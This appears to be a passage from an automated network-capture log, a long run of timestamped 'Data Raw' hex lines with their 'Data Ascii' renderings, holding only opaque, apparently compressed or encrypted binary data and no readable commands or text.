                                                                                              2021-12-13 23:57:16 UTC5048INData Raw: 00 09 33 2b d3 7e 60 6d 4b 1b 8b f8 66 93 5f a8 4d e6 f0 ac f7 51 a8 c5 76 81 88 b7 6d 63 44 1a 80 8a 51 dd 34 2c d9 f6 e9 f4 f7 b4 af f2 99 7b d3 d2 57 e0 45 17 1c e1 3e f7 7e ad ba b4 7c 48 d7 14 ba 1e c8 28 b4 cb 82 33 18 0f ef 1a 99 20 93 81 65 e5 81 bc a5 e9 5c 01 45 b1 9f d5 86 fd b1 c6 0a 27 fb d2 ed 9e bd 16 51 64 44 fd 46 a7 a4 63 99 54 c2 58 b2 74 b2 ea d4 25 f9 94 e3 8c e7 ff 3c 06 cd 3b d3 e1 0f 69 32 6b c7 6d 67 ef 96 2d ad 5b ea 8d 09 c6 b6 18 1c 54 5e 37 18 0a 4a c5 9a cf 52 7d a5 98 bf 1a 69 19 03 bf 9b 26 b5 be 31 ca 1b cb 52 ef 46 ab 89 8c 55 a5 c2 69 b9 b8 73 a0 7a 58 9f 65 cf b4 e7 60 4d 83 aa 40 c3 b1 e9 75 ad fd 17 ac 4d b4 7e 0f 63 c2 df 00 fd 90 09 93 be 5d ed ef 8b 16 d4 af 7d 68 38 3a 3d 94 43 2b 22 cf c2 4c 50 6a de 8f ff 22 cb
                                                                                              Data Ascii: 3+~`mKf_MQvmcDQ4,{WE>~|H(3 e\E'QdDFcTXt%<;i2kmg-[T^7JR}i&1RFUiszXe`M@uM~c]}h8:=C+"LPj"
                                                                                              2021-12-13 23:57:16 UTC5064INData Raw: bc b6 af 01 57 f6 20 b4 22 d6 c0 22 c0 ff e3 da 67 9b 7e 65 67 45 e7 84 b7 7b 90 a8 7e 26 17 7a 79 14 b1 d6 9d 9a fe bc 49 b9 7f 75 d2 f6 de 72 9f fc 46 de 9c 9f 97 84 3d 8d e3 32 eb 40 b2 ac e2 fa e4 6e d9 41 10 06 d8 d3 3c b7 7c 88 50 e3 50 6b 03 8c 6e 26 32 07 16 cd 04 bc af 89 eb 4a d2 e7 8b ee 81 6a e4 a0 00 ed 44 50 ec 8b 9b 55 ec 8e b7 c8 a3 62 d7 b4 71 e7 01 1c ff 65 56 1a 6d 43 a4 ff 57 b6 8c fc 98 22 d8 85 8b d3 3c c0 66 27 ee d0 85 8d d2 41 c2 3f eb 56 48 44 1b ce ca fb 1d 6a 8f 29 e1 56 0e 66 5d ba b6 0b ad f7 81 50 58 c4 92 bd 33 f9 24 05 7f 9f 61 77 5a e5 62 aa 67 eb de 33 0a 06 0b 1f f0 6a 55 33 c0 f4 1d 42 ab 62 17 4b 37 4a 90 23 01 98 38 db 42 de e2 ef 82 c0 bd 05 7b b9 79 39 db b5 5e 1c a6 c4 6c fe 47 f9 ac 8e b8 69 d0 7c 95 2e 6b 6a 91
                                                                                              Data Ascii: W ""g~egE{~&zyIurF=2@nA<|PPkn&2JjDPUbqeVmCW"<f'A?VHDj)Vf]PX3$awZbg3jU3BbK7J#8B{y9^lGi|.kj
                                                                                              2021-12-13 23:57:16 UTC5065INData Raw: 81 db 8a c1 fa bf d6 8f c3 59 dd 26 20 ea 22 63 34 1c b7 60 5f 38 d3 a2 4f 69 a2 70 ca 5c d6 2f 4f 49 17 b9 50 3c 3a 6b 18 2e e5 04 0e 1a 84 1c b6 de e1 80 23 46 ea 54 7e 27 30 ad 6b a3 10 05 2d 6f 20 cb 80 99 88 9f aa 48 6b 3c 10 b3 d5 db 35 03 95 88 03 ff 1e 6c 3f 98 ba 17 66 35 df 96 cb 71 3a 7d 64 f6 c6 f0 c0 4c 7e 5b 9c b8 6c 9b 30 bc 88 09 48 d5 40 d8 96 08 9f 5e 67 36 b6 5c 21 9c ab 96 ec c0 e7 de 93 36 ed 24 c8 db 51 71 e3 b2 32 0f ce 06 46 da 2f 93 0e 55 73 c9 42 b7 19 90 30 3c c5 84 8c ec f5 0d e5 b5 55 7c 02 40 dc ca b5 bf f2 c5 21 9d f1 81 2b 04 35 89 87 45 9c 67 d7 d2 5d a0 c4 69 50 8a 57 d2 cc 81 12 1e 4f dc 9d e4 69 a7 6f ac e8 6b f5 f3 6f e1 5a f1 0c 9f 8d 61 89 93 61 d3 71 a9 88 f5 5d d8 a6 2d 91 8d 9c bb 71 bc 69 04 c4 de 41 ea e9 55 dc
                                                                                              Data Ascii: Y& "c4`_8Oip\/OIP<:k.#FT~'0k-o Hk<5l?f5q:}dL~[l0H@^g6\!6$Qq2F/UsB0<U|@!+5Eg]iPWOiokoZaaq]-qiAU
                                                                                              2021-12-13 23:57:16 UTC5081INData Raw: dd 78 45 68 78 a1 d9 9e 65 12 ae 5f ad 70 43 4b 83 a0 d5 0e 1c 0c c2 bd 35 32 46 57 26 63 f7 cc 80 d2 77 7b cd 32 66 47 6d b6 8b 40 40 01 6c 02 6a 0e 35 74 c8 33 7a 95 57 cb a2 3c 99 e1 01 d9 33 b3 fc 75 a7 e2 97 6e 08 e2 ff c5 b0 f2 79 f0 5d 41 68 8e 42 f8 43 70 0b 4d 59 4c 91 ba f5 93 2d 74 5f 65 9b 00 0d 21 d7 96 b4 66 84 ab 92 f7 5d 8a e7 11 f7 72 bb 86 b0 13 4e 8e 6e 4f cc 5c 9a e5 64 e3 7d 33 56 46 8d 43 78 b6 af 9f 29 87 9e a6 34 81 f3 5b 72 f0 d9 82 fe bc e0 13 df f2 df 76 75 02 ed a8 6d da 13 a0 50 b8 8c dd fb e5 df db a3 97 8a 14 94 80 17 6a 40 29 f4 67 c0 28 07 53 4a e9 5e 22 6f 75 a0 1b 1a 70 e2 84 1c c5 b6 ec fb 96 e3 2a 7b c4 69 cc 62 39 ea b0 85 a5 36 51 18 4e 91 97 c7 38 77 21 33 75 b0 1e 8c 2b 69 26 f4 e0 b3 a9 d1 c9 fd 09 b2 a8 8c 58 2d
                                                                                              Data Ascii: xEhxe_pCK52FW&cw{2fGm@@lj5t3zW<3uny]AhBCpMYL-t_e!f]rNnO\d}3VFCx)4[rvumPj@)g(SJ^"oup*{ib96QN8w!3u+i&X-
                                                                                              2021-12-13 23:57:16 UTC5082INData Raw: 02 66 ae 9b b4 8b 9f 5d 90 9c 37 d0 1e 2a 81 db 58 a2 75 d0 de ac 69 f3 c4 1e eb b6 b0 d3 d4 42 f9 2f dd f2 50 36 bc 63 d3 46 62 20 84 34 b4 93 55 52 b9 44 58 6c 4d bc 59 43 40 d9 e4 c1 6c f8 10 10 3e 4b e0 75 39 1a fd 40 74 9d b0 ab f8 75 84 e4 06 68 ca e8 14 21 c9 f1 e5 f4 c2 cb cd 63 9a 14 29 09 eb c9 4b d8 2f 0f 74 d9 49 ee 4a c3 63 ca fb 41 f4 17 72 0d cf d6 66 86 08 d4 60 f0 17 91 46 04 8f 34 89 13 62 61 d6 f2 52 12 34 87 12 e2 40 a2 36 32 be e7 a9 b2 1c 3d 71 5c ed 99 82 e3 eb d3 4b b7 35 b1 81 5c ea 5c b9 ba 1d ac 55 93 f8 8c 33 8d 20 9a 78 94 b9 22 a2 ec 10 30 47 5d 86 17 eb a0 fc 47 8c 19 c4 1f de 00 d8 69 67 e1 68 2b 44 41 bd 82 23 5c 30 bf 54 4e 77 5c 7e 9b 0d fc 5c aa b7 be 55 46 55 ca bb 1d 9e 4d 41 ba e8 56 66 d2 f2 81 76 23 f2 1d 99 07 ec
                                                                                              Data Ascii: f]7*XuiB/P6cFb 4URDXlMYC@l>Ku9@tuh!c)K/tIJcArf`F4baR4@62=q\K5\\U3 x"0G]Gigh+DA#\0TNw\~\UFUMAVfv#
                                                                                              2021-12-13 23:57:16 UTC5098INData Raw: 16 33 1a 8b 30 6a 99 bf 7d 97 51 78 66 74 3b c6 3d c2 3b 12 23 d2 dc 9c cb b5 93 3a 02 40 88 df ed 49 0e f0 cf bd 03 36 e0 31 ba 21 6a f4 a1 74 e3 e7 31 5f 8f 7f 9d 45 19 8c 4c 7a 7b 01 e9 62 00 0f f5 64 06 c9 0c 12 ed 05 40 1d 74 92 f4 5c b9 81 fd e8 d2 0a 43 bd ad e2 fe 11 15 81 56 00 08 33 98 07 85 53 00 c5 3c 60 84 2a 34 ed cc ec 94 e0 75 b0 29 6c 31 c5 aa 1f 19 ee 68 b7 0e 24 87 00 39 b2 b1 37 9e 42 d4 98 43 1e 1a 51 44 2a 17 7f 8a 6b fe b9 07 c8 fb 56 d1 16 70 3e e8 38 a7 fb 92 0f 36 c9 f2 93 10 1c 1f 21 35 28 98 5b 7e 8a 6a a9 26 88 05 64 2a 31 19 80 c4 a6 48 40 f3 59 aa c0 4d 0c 84 11 73 6a fd 27 da 2f 83 42 b1 e3 7c da e9 b0 54 85 4e 52 bf 70 30 b2 cb f7 98 2f e6 91 af e7 f4 09 b9 70 ab c0 ee 5f 3e 1d bd 3c a2 94 b7 f6 bd 5d f3 a8 27 37 57 e8 35
                                                                                              Data Ascii: 30j}Qxft;=;#:@I61!jt1_ELz{bd@t\CV3S<`*4u)l1h$97BCQD*kVp>86!5([~j&d*1H@YMsj'/B|TNRp0/p_><]'7W5
                                                                                              2021-12-13 23:57:16 UTC5099INData Raw: 29 e0 e4 dd f1 b2 27 fb 5a c7 8f 22 3d 7a 3b c4 d9 0d f8 07 cb d6 ee 97 27 29 ce 2f 72 86 91 38 bd f1 b7 7c f5 3b 02 0d 12 ff 7b 75 1c b8 12 51 12 ef cb 42 fe c0 83 4d d4 56 3c 5a b5 79 c0 3e d5 41 07 f7 b5 59 e1 6c 31 23 5c 17 c5 d4 88 33 27 21 1a fd 07 72 74 bf 05 52 a2 00 d9 25 b1 fb 10 21 64 1a e6 03 bf 9c 18 bb 8e 21 da df 1d d1 1a f5 c5 9d 01 78 64 0c a2 15 cc 41 38 02 63 e3 00 99 1f 8c 72 c1 16 f4 66 7d c2 e6 fa 0c 71 4f c0 fa 03 84 28 78 06 12 9d 14 f4 bb 4a 35 3a cf c7 87 cc 9d 66 b9 14 26 9d f8 21 74 09 4a 80 58 32 b3 4f 90 33 fd 28 0e 35 f4 bf ff 79 db d7 2e 5f 9b 1c c1 91 0f a4 07 80 84 c5 dc f4 68 ce 65 c9 01 75 97 43 78 80 b5 3d 3d ce f8 8d 32 34 be dd cf 5b c0 24 0a 1e 7a d9 0e 56 f7 5b 15 3f 10 a8 d8 a1 df b5 3b 03 10 a4 13 76 b1 ee ca 10
                                                                                              Data Ascii: )'Z"=z;')/r8|;{uQBMV<Zy>AYl1#\3'!rtR%!d!xdA8crf}qO(xJ5:f&!tJX2O3(5y._heuCx==24[$zV[?;v
                                                                                              2021-12-13 23:57:16 UTC5115INData Raw: c3 18 0f f5 d1 ca fa f8 12 0b 90 10 9d 2b 22 9f d2 f2 32 da 1b 70 b5 b6 c4 eb d1 ef 81 5e 43 57 70 ff 92 b8 d0 42 de f6 cd 68 89 c8 25 a8 d3 2d e5 89 69 c9 27 13 ef 1b e3 23 c0 86 fc 02 82 5f fa 97 18 ab 68 8c ee d1 06 1f 12 40 71 6e 28 a6 d9 38 50 14 6c 5e 77 1b 79 88 ae 5a 38 a6 61 8b 01 28 30 6a e7 82 79 62 47 50 4b e5 f9 94 30 fd 19 0f 2f f4 26 ec f7 0e a6 65 e7 65 88 28 da 9d fa b9 d1 03 32 89 fc d5 f3 f5 43 d1 b5 80 75 00 0b 09 5e b9 59 cd d5 bc 7c 0d 8b 86 84 f6 70 8d 80 b0 c0 92 07 99 1b 0d c2 69 f9 d2 24 85 9f b1 06 ec ec 67 a1 e9 a0 e7 11 df 24 09 57 aa f7 29 b8 51 26 2a be 21 0c e3 5d 9a 11 db 72 16 e5 c9 5f 1c 92 20 4e e0 35 a6 2f a7 b1 bb 2c aa ee 2b b3 20 17 2a f8 13 37 87 7a 68 d5 6c fe 38 fe 09 ae 73 5d e1 b6 19 b3 b4 79 0c bc 0b 49 a1 f9
                                                                                              Data Ascii: +"2p^CWpBh%-i'#_h@qn(8Pl^wyZ8a(0jybGPK0/&ee(2Cu^Y|pi$g$W)Q&*!]r_ N5/,+ *7zhl8s]yI
                                                                                              2021-12-13 23:57:16 UTC5116INData Raw: 34 d1 e7 15 de 43 ea ce e0 58 6c 08 0a 38 a9 04 45 fc bd fb 64 d2 e7 4b e1 b9 fa 9a 23 07 13 60 e6 42 02 89 db 4f 62 12 17 42 2e 83 af ea ef a9 d3 1e b6 74 5a 2d 89 74 67 00 3f 2b 12 95 1f 5e 0b 6c 13 21 f5 d8 ce 20 61 e1 1c af 09 1e 1c b8 5c e8 47 ca 96 0b de fd 8d a3 97 b1 8d c1 e3 c4 49 86 81 97 42 31 5b b2 58 60 ed c3 66 44 93 2d 24 59 7b a8 8f 9c bd ba ff cc 9a 78 8f 30 28 49 2d aa e1 93 de d3 36 2c 32 df 44 f1 a4 52 cd c5 32 fc 8b ac 41 f3 1e fb e5 37 0a 70 02 3a 02 03 85 35 80 53 99 96 3f 80 bd 77 b6 a8 4f 1d 06 6e 07 54 77 db 92 5c e7 81 40 5d 13 2f 77 af e2 ea c0 0c f6 97 97 70 17 a7 a8 db 76 db c8 4f a5 77 98 b1 cb 4a 11 46 2b 82 d4 79 1c 86 74 10 c2 1c c4 0a c0 62 ab ef f6 41 d6 aa 94 72 97 cb 91 9e 52 1a 09 3e 6c 0c e2 b9 2f 1f 38 a3 35 82 62
                                                                                              Data Ascii: 4CXl8EdK#`BObB.tZ-tg?+^l! a\GIB1[X`fD-$Y{x0(I-6,2DR2A7p:5S?wOnTw\@]/wpvOwJF+ytbArR>l/85b
                                                                                              2021-12-13 23:57:16 UTC5132INData Raw: 90 5f 0a d6 dc f8 d8 68 01 d6 fe ee 5d 9c 6c 94 a2 df c3 ee d4 89 bd 74 b3 75 0d b1 21 67 40 3c c4 bf a7 74 c0 2f 9f 7e 33 82 3f 9c 36 dc 03 96 c0 ce 89 64 21 66 ce f9 15 72 e9 fe 26 2f a0 e5 e4 70 b6 1a 69 7f fc b9 ec 77 ae 1c 9a 00 2f 11 62 d1 70 11 a5 ac 4b ab 41 74 3a 28 d9 62 e6 74 c5 d9 c1 38 a5 34 65 29 c4 1a 8b 8f 08 dd 81 79 55 8b 79 25 94 be a6 6f 42 f9 d2 aa 93 f8 82 e8 9e d0 7c 33 bc ae 40 67 43 b8 dd 2f 7e 28 e6 42 db 56 04 08 5a 5b 4c 0c bb a6 d3 2d d7 dc 6e 82 05 4e 1e af a6 e7 5d 31 21 90 f4 87 67 22 1d f8 7a 74 bb 38 d9 be ad 00 d6 98 4f 4a cc a1 a3 62 0a 00 d0 d9 db de 59 84 f3 fa 91 68 f5 26 54 86 3d 99 da b0 3d 67 2b a8 71 01 b6 d3 43 fc e6 d5 bb 77 9c bc e7 ce f0 22 35 86 9d f1 c5 8c 05 36 d9 d3 5e e1 ab 99 16 49 5d f6 26 13 20 02 02
                                                                                              Data Ascii: _h]ltu!g@<t/~3?6d!fr&/piw/bpKAt:(bt84e)yUy%oB|3@gC/~(BVZ[L-nN]1!g"zt8OJbYh&T==g+qCw"56^I]&
                                                                                              2021-12-13 23:57:16 UTC5133INData Raw: 17 fd 35 3f b7 82 bd 9d b7 4b 0a d8 f6 f7 93 72 05 71 e9 1c 0d 57 3d 10 fb c4 52 7d d1 97 ae 47 29 ce 33 d5 af 24 12 7d ea 4b 51 eb 66 28 2c 83 be 40 21 aa 1b 02 60 8a e9 a1 bf 80 25 c5 85 07 9b 3c 7e 51 83 a9 13 b3 b5 90 b3 ca b8 51 a6 51 ea 22 b1 1e 44 18 a4 3c d6 14 7c d5 fe a5 a2 a2 53 f1 f9 0c 91 dc bd 0a bf b4 9b 1c 33 c2 03 7d bc 35 df 33 17 35 34 58 9e ba 51 78 0f 99 4f b5 36 a1 0c 8c 65 30 20 87 86 44 94 d8 18 95 82 9b 2a e0 77 d3 b2 b5 68 92 37 ce cd a9 9c 76 9c 49 dd f0 2d 13 06 b3 de 38 23 67 b8 3b 83 a3 b5 ae da 00 8e ff 1e e4 57 17 82 be 67 d4 22 12 02 ae 0c cd b4 aa 3e 25 61 2f 66 4b bc 36 d0 f2 e5 86 bb 05 a8 80 16 3e 24 a3 5e ac e1 d7 05 2a 64 3d 1c b1 5d 23 04 16 c3 f3 af 6c 94 d5 54 6c 02 14 b7 8d 28 c1 74 e4 f9 50 eb af a3 8a 1f 89 ef
                                                                                              Data Ascii: 5?KrqW=R}G)3$}KQf(,@!`%<~QQQ"D<|S3}5354XQxO6e0 D*wh7vI-8#g;Wg">%a/fK6>$^*d=]#lTl(tP
                                                                                              2021-12-13 23:57:16 UTC5149INData Raw: b1 c7 68 db d2 45 4f 33 f0 aa c6 2b 6a 7f 5c 42 b7 36 22 ee f5 09 27 65 e0 09 19 54 e8 f7 73 41 9d 60 05 54 b7 95 71 a3 ee ee 8b 6e d9 e0 a6 19 57 aa bc 66 f5 13 3d df b2 46 d6 ea a6 3e d4 2c 75 c2 32 76 4a 20 40 ab e9 98 80 93 78 1d ce 43 9a b9 0e 8f be 19 83 13 b9 c2 fd 04 17 28 47 35 07 49 4a df b5 b8 e8 86 7e 12 e2 21 dd b5 d6 40 21 53 ac 16 b6 8e 0b b2 bc 24 a7 cc 2a 5b 89 88 a0 1d 94 36 5b 12 cb 9a b1 3c ce 0b 71 41 8b 32 41 3b 13 8a 60 a2 dd 88 d9 33 8f 11 5b 1e 62 a5 6e 28 47 5a b2 b0 41 a1 12 53 78 64 8e bb af 89 95 82 d4 75 9c 57 61 95 75 58 7f 02 d5 56 c4 95 e7 ec 4f 14 5e 5c 76 c9 72 35 d8 08 d8 45 ef ad e9 1a 04 84 ff eb 9a a1 bc 0c d8 13 fa 3e 9e 2e b1 3b fe 9a 54 bf 9b 66 1d 11 e9 45 28 74 f2 1b 50 44 0c cf 5c fb bc eb 8f 69 2b 9c c5 49 19
                                                                                              Data Ascii: hEO3+j\B6"'eTsA`TqnWf=F>,u2vJ @xC(G5IJ~!@!S$*[6[<qA2A;`3[bn(GZASxduWauXVO^\vr5E>.;TfE(tPD\i+I
                                                                                              2021-12-13 23:57:16 UTC5150INData Raw: fb 0f 54 4d 44 47 49 d2 d0 63 ac 8d f6 fa 24 ec 4f bf 2d 4c 23 b9 d0 ba 22 e5 f7 99 b0 29 91 a5 d5 d3 11 03 2d 83 8c b5 69 67 e4 6d ee 2d f3 fd fd bb 16 27 82 ff e1 0d f3 7d b2 c9 cf ce a4 e4 fa 29 2b 26 21 56 e8 a2 a6 74 eb fd a3 e0 66 f6 9f 49 41 e1 3d b1 31 9c 81 3d b2 de 93 4a d8 9e f0 69 fc 51 8f 9f 01 79 c1 14 77 cd 7c f5 8d 26 86 87 53 2c 80 6a 24 0c 88 78 19 50 a8 c8 ae d6 07 e0 96 74 3d 5d 10 b6 1d c1 31 62 87 ba 30 36 03 b2 a4 ca 3e 3f cd 79 6e d0 43 29 18 25 98 f0 17 75 70 04 e4 74 77 62 27 61 48 7f 02 0e 29 d0 3a c5 2a f8 c7 27 fd 59 42 6e e2 aa 77 ae d8 81 85 f0 22 fb 5e 16 cb 5a 1b c6 df cc d4 0d ea 69 e6 0b e2 76 74 2d db f9 26 a3 77 61 9f d8 81 b9 fc ae 28 c6 84 71 f8 e7 79 f4 e2 16 0c 54 28 e7 37 2f e2 8c 21 f5 67 f0 3f 75 4c f9 22 e5 c5
                                                                                              Data Ascii: TMDGIc$O-L#")-igm-'})+&!VtfIA=1=JiQyw|&S,j$xPt=]1b06>?ynC)%uptwb'aH):*'YBnw"^Zivt-&wa(qyT(7/!g?uL"
                                                                                              2021-12-13 23:57:16 UTC5166INData Raw: 4f 96 4a 43 77 b2 18 0e 7d 8b 0b 6c 68 e0 17 6f d5 0c 56 ba 2b f8 8d 73 84 ba ae 12 19 d1 b3 60 d8 8e 21 b8 78 bd db bf 8a 50 8f a1 c2 a8 82 f5 3d 6a 7a 77 0e 5b c4 59 7d 6d 18 26 d2 45 c2 10 78 88 85 15 d8 ba ae b2 f7 85 27 0a ce eb af 71 98 47 80 d9 dd e2 29 2d dd 4e 41 28 cf 44 46 8a 68 04 35 c7 c8 29 cd 8b 5d 6e 2c d7 5e 34 ee c7 45 d4 8c 44 c3 90 89 ee 62 72 fc 3f 9d d4 1a 9b c5 1a 3d 7a c3 29 02 f5 21 dd 7c 08 d7 ee ce 3f cf 2b 62 9e 67 b3 20 c8 93 9e 00 d9 c8 c9 12 e5 72 e7 d9 94 a5 2f 4b 67 26 80 7f 0a 66 45 0e 81 d8 c3 c0 b1 70 d4 42 49 50 c8 54 94 ca f2 8a 78 62 7a fb 0b 26 7e 4b 87 99 70 9b be 55 f3 4b cd b4 78 89 50 51 86 71 1e 07 66 11 c8 ab e1 64 33 70 d1 8f 65 7d 94 f2 58 d3 4a 6d 97 37 21 54 4b ca e6 bf 6c 20 c5 16 00 90 3a e8 a1 e7 66 7c
                                                                                              Data Ascii: OJCw}lhoV+s`!xP=jzw[Y}m&Ex'qG)-NA(DFh5)]n,^4EDbr?=z)!|?+bg r/Kg&fEpBIPTxbz&~KpUKxPQqfd3pe}XJm7!TKl :f|
                                                                                              2021-12-13 23:57:16 UTC5167INData Raw: 7f 24 bc 53 d6 23 15 fa 0f 40 83 ac fa 66 45 76 92 46 ed 4e ee b7 e1 25 68 82 f2 a6 8e a8 60 72 a3 04 15 06 76 69 b7 27 a0 2c c4 12 66 ab b3 1b 2f 5b a9 18 ee fd 36 6e 3e 04 29 c7 25 c5 7b a2 ce 32 4f 13 48 32 17 88 bc d3 e2 d6 42 7b 86 ed 3a 32 3f 07 8c 92 cc 25 e5 94 32 3a ca 94 17 75 0d 83 a4 0b 30 61 d9 22 37 62 54 cc b7 11 fa 75 2d 33 ce 4b 1d d5 8e f5 b0 91 75 3e bc e5 6b a6 d9 3f 30 0e 4a a5 d2 eb 25 a7 45 d7 6d b2 20 bd 3c 96 9d c7 fa 83 28 42 f2 8f 28 1e 9a 19 f1 bb 43 9a 31 c0 f5 74 68 cf c6 39 65 7d 62 32 a4 38 05 22 ca 90 60 a7 45 d9 aa 22 c8 7e dd f2 0c c2 45 38 30 91 80 db bb 28 90 c0 3f ea 20 cd e6 21 ce 94 80 81 5d 5a df 56 ef 5b 72 4e 50 2d ec 44 6d 84 c1 ff ca ba 3b 77 ba ec 15 0e 27 0d e1 ef dd 11 89 7c e4 fe 66 13 80 ff 63 14 49 27 28
                                                                                              Data Ascii: $S#@fEvFN%h`rvi',f/[6n>)%{2OH2B{:2?%2:u0a"7bTu-3Ku>k?0J%Em <(B(C1th9e}b28"`E"~E80(? !]ZV[rNP-Dm;w'|fcI'(
                                                                                              2021-12-13 23:57:16 UTC5183INData Raw: ca c1 94 c1 43 07 57 a8 07 29 3e 88 3c 42 09 8b c5 8f 16 7b 8c 32 91 bd ae 3f 6e f1 f1 8f eb 16 59 12 a0 11 e5 74 ae ab 4d 47 75 41 2d 3f 48 f7 48 e2 52 40 0b 64 0c 18 55 bd 0c 47 cf 72 ea 43 13 f8 c4 73 b6 19 ce 7e 34 a0 4c d6 0a 5a f0 d6 64 20 b8 bc cb b3 8a 1c 34 61 ca 11 90 34 5d 4f 4b 44 69 b4 75 1d f5 67 c3 6c ba 77 66 5c 08 de 43 cc ed d8 bb 21 be 8d bd ea 2e dc fc e2 a6 d0 3c b2 2f 31 d1 8b 68 db 0c 30 ab d2 43 ab ec 53 a2 cd ae 13 c6 73 ba 0e 83 0f f4 a8 10 73 99 86 36 3b f8 ad 72 18 f7 4a c5 80 70 e2 10 3d 1f 55 45 f3 83 ae dd 02 ca b6 a0 c3 4a 1c 13 ff ea 3f 20 7f 25 b3 27 d3 52 06 1a 4e bf 67 e6 39 a9 e6 26 94 26 8c e5 fc 28 8e 96 c8 ad 86 9f 5b eb 3e 1a cd 30 8c 18 09 2c 4b de 3c 92 41 65 e9 9a 5c 0a 88 ae 25 4d a2 53 36 65 4d 2d 29 61 19 fe
                                                                                              Data Ascii: CW)><B{2?nYtMGuA-?HHR@dUGrCs~4LZd 4a4]OKDiuglwf\C!.</1h0CSss6;rJp=UEJ? %'RNg9&&([>0,K<Ae\%MS6eM-)a
                                                                                              2021-12-13 23:57:16 UTC5184INData Raw: 7d 4f 72 70 24 df f2 a3 92 a6 9b a1 70 a8 12 02 45 25 48 9b 33 51 1c d0 9f 1e 35 d1 a0 99 9a 6c 72 73 71 5b 1b ea f4 d3 93 a7 6d 8a 01 6f f6 2e 1d 65 f7 a2 c1 c1 6a c0 d8 ae f8 fc 41 07 93 b4 70 bf ba 1c 38 fd 7d 8e 05 40 cd 3b b7 1b 82 44 50 d5 71 6f 90 ff f4 ba a1 68 1b 90 fe e4 13 ec 4c 39 a4 d6 07 e3 4f bb c5 b5 b9 57 e8 42 cc 3b a9 3a 49 11 ff ce 26 9c 76 35 32 4b 0e 91 73 6e 40 a2 d8 3d 3c 8c 7c 45 2f b4 6c 7e ea d6 a7 81 f8 9d fb d4 da e2 aa 3d ff de 3b 80 27 07 2e 26 0b 85 e9 5e 07 f9 b0 56 4b c7 c7 23 76 63 c8 f2 8d 89 19 31 17 03 f1 a6 9e 2b 30 69 10 b0 03 64 74 f3 1b b1 5c a6 63 be 0a 6d f6 cd 45 53 56 10 39 42 e8 52 84 6f cc 4d f0 5f eb d7 3b e3 e2 6b f8 ed 82 1f 7a d5 45 36 5e fe e9 76 51 95 dd 8f 23 aa f4 c4 4a 83 66 94 86 be d1 1d 8a 0d 86
                                                                                              Data Ascii: }Orp$pE%H3Q5lrsq[mo.ejAp8}@;DPqohL9OWB;:I&v52Ksn@=<|E/l~=;'.&^VK#vc1+0idt\cmESV9BRoM_;kzE6^vQ#Jf
                                                                                              2021-12-13 23:57:16 UTC5200INData Raw: f3 19 41 e8 c4 03 36 63 7d b4 7d 86 d1 79 c8 96 4f d7 68 6e 30 8c 75 a9 63 5d b4 b6 13 8c 3d 8d 30 c3 5e 6d 38 b1 fb d5 b1 16 93 cc e2 f6 da a9 bd 99 67 07 f0 69 16 3c f7 26 03 d8 3c 97 a9 b1 08 41 bd 58 02 12 c8 12 8b 4a 6d 6b b9 7b 01 ec 2c fd 2f 56 09 dd 3c 34 5f 7e a2 75 f3 a9 75 dc ef 60 30 c7 92 38 e9 03 fb c9 05 5d 0e 52 1e fe b3 50 d6 79 1a d9 49 57 fc 2d 6b 2b 92 2a 99 6b 26 c5 33 3d 2a a7 27 6e d5 91 fe 46 5c 2c 67 8b 72 8d 75 24 3d dc 07 9e 0e f9 49 6d ed fb 03 21 6c ec 2b 9e 35 b6 26 b6 d3 0f e5 b7 3f 8f a1 57 51 29 06 e6 9d 92 90 be d0 ec ae af f3 1a 41 2b db 52 9a a0 c7 f5 36 5e ea 5c f8 83 fe 84 29 24 fc 3a 70 5d e4 69 bb ff cd 95 c6 63 1b 99 98 b2 51 b5 18 43 e9 45 00 9a 05 bf 80 60 b6 27 21 56 81 ad 10 bc 7e 89 b9 32 86 65 e7 a6 b4 be 16
                                                                                              Data Ascii: A6c}}yOhn0uc]=0^m8gi<&<AXJmk{,/V<4_~uu`08]RPyIW-k+*k&3=*'nF\,gru$=Im!l+5&?WQ)A+R6^\)$:p]icQCE`'!V~2e
                                                                                              2021-12-13 23:57:16 UTC5201INData Raw: 9e 72 ee c3 9d 5c 07 e4 93 c8 5f 38 d2 20 38 18 eb e9 8e 4e 10 04 85 e3 af ec 41 20 e0 c0 62 b3 38 24 1e ae 3e f9 99 31 ae 32 af 29 dd 05 fc ee de 22 91 2e 14 67 9e ac ff 3f 17 83 72 bb f7 5a 13 24 5c 29 3c 36 02 7a 90 ec 43 ea 85 ba be 50 28 f4 54 a9 6e 10 e2 62 66 2b 0e 4f 72 57 98 6d 3a a2 f6 c0 9c cf 8b c5 20 b1 56 57 3b 97 08 64 00 6a 9e de 05 fb ee fd 6a 4e 8d aa 22 bf 32 20 69 8c 7c bb 96 05 e9 24 47 2d 12 d0 1e 31 ab 79 dc dc d3 9b 56 cb 64 39 10 f9 ff a4 f8 cd 4d ec ae 3d 82 28 0a b1 70 6a 2c 48 7c e0 97 0b 0c 16 a5 aa fd 34 7a b7 b8 2d d7 f0 16 f8 db 32 ab c9 64 c3 f2 f1 6d 71 cb 3a 76 11 9a 77 f6 bf b0 48 1b 5c e3 29 18 6c eb 44 9f aa 7f 91 79 3f c2 f9 8c eb 34 62 15 0f 62 a8 0e 71 27 72 cd 52 a7 2c f2 a4 a0 56 6f 98 26 5c bc f4 74 92 e9 23 8b
                                                                                              Data Ascii: r\_8 8NA b8$>12)".g?rZ$\)<6zCP(Tnbf+OrWm: VW;djjN"2 i|$G-1yVd9M=(pj,H|4z-2dmq:vwH\)lDy?4bbq'rR,Vo&\t#
                                                                                              2021-12-13 23:57:16 UTC5217INData Raw: 07 b3 37 4d 2f c9 a5 c7 4e 3e dd 2a b7 86 55 da 24 6f 15 b2 b5 b2 62 e5 ea 1f eb 87 a6 fd a4 b2 78 b3 53 0f 00 ce ed bd a2 bf 0e 38 5c b8 57 1a 30 49 e6 4d de 55 8b 1d 89 5d 31 d3 b7 04 c5 e7 72 ce 78 c7 e0 24 ff 22 41 54 70 0b ac 86 4e 87 60 9c 6f 34 4b e3 22 31 43 4d 93 bb 7b 9c 0d 96 14 20 bf 34 74 c3 7a 98 f8 1a 7a 2c 06 ce 71 cf ac b7 9b 86 8f ee e7 d0 99 cf cd cc 25 33 58 0c 9e 39 98 8f e1 9c a4 61 a4 e4 30 c8 5f c6 64 56 9b 16 c7 1f 45 55 25 d9 f6 83 18 04 9b f2 df 2a ea 20 a1 e2 00 a6 16 37 6f 1b 26 53 65 77 82 a6 95 a2 af 24 7f 62 f0 77 85 e2 f6 6c bb 5d 26 9d b4 29 af 33 c0 a3 9c b6 1d 18 f9 02 7f f1 8b d6 44 af 27 fe 78 5d 88 7d 3a bc 50 5f cf cd 3e e6 b0 57 23 2a 90 e8 